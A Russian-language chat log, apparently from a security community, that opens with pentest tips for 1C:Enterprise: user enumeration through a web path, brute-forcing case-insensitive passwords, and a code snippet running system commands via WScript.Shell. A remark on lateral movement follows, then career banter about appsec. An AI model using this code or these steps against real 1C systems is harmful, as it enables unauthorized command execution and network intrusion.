кстати кроме шуток

Что нужно знать, при пентесте 1С

* Иногда там выдаются имена пользователей (если включено) в автодополнении, либо можно попробовать обратиться на /ru_RU/e1cib/users.
* Пароли из коробки не чувствительны к регистру. "Пароль" и "пАрОль" - одно и тоже, что уменьшает количество для брута (особенно классно вместе с предыдущим пунктом).
* Внутри часто есть выполнение произвольного кода.

В консоле же легко выполнять произвольные команды и выводить их с помощью функции "Сообщить".

Например:

СисИнфо = Новый СистемнаяИнформация;
Shell = Новый COMОбъект("WScript.Shell");
UserDir = Shell.ExpandEnvironmentStrings("%USERPROFILE%"); 
Сообщить(СисИнфо.ВерсияОС+" "+СисИнфо.ТипПлатформы+Символы.ПС+Символы.ПС+СисИнфо.Процессор+", RAM: "+СисИнфо.ОперативнаяПамять+" МБ"+Символы.ПС);
Сообщить("Каталог 1с: " + КаталогПрограммы());
Сообщить("Пользователь: "+UserDir);
Тасклист=Shell.Exec("tasklist /v");
Сообщить(Тасклист.StdOut.ReadAll());

Дальше уже можно загружать внешние сценарии, повышать привилегии (скорее всего уже будет админ) и распространяться по сети.

все так, в апсеки нужно крепо прогать. Некогда учится прогать, иди в десекоПСЫ

это тоже на хайпе и тм хватает скриптов на питоне

да и тема смежная, там недалеко до апсека настоящего.

Зачем крепкому мидлу становиться апсеком?

Он будет секьюрити чемпионом )

пояс дадут?

Если ему не интересно круды по кругу писать, например. Я знаю и сеньоров которые выкатывались из ит

Тема интересная, но я все никак не доберусь до освоения - последнее мое плотное общение с 1С было в 2012 году, когда я чуть было не ушел из этой вашей безопасности)

Шахида разве что

Я про деньги больше, сомневаюсь просто

Не все в деньгах измеряется)

Пусть горит в аду

Если выше определённой суммы то да

И у каждого эта определенная сумма своя)

Я хочу Бентли)))

Начинаешь изучать питон или джаву, втягиваешься и забываешь секьюрити как страшный сон.

Согласен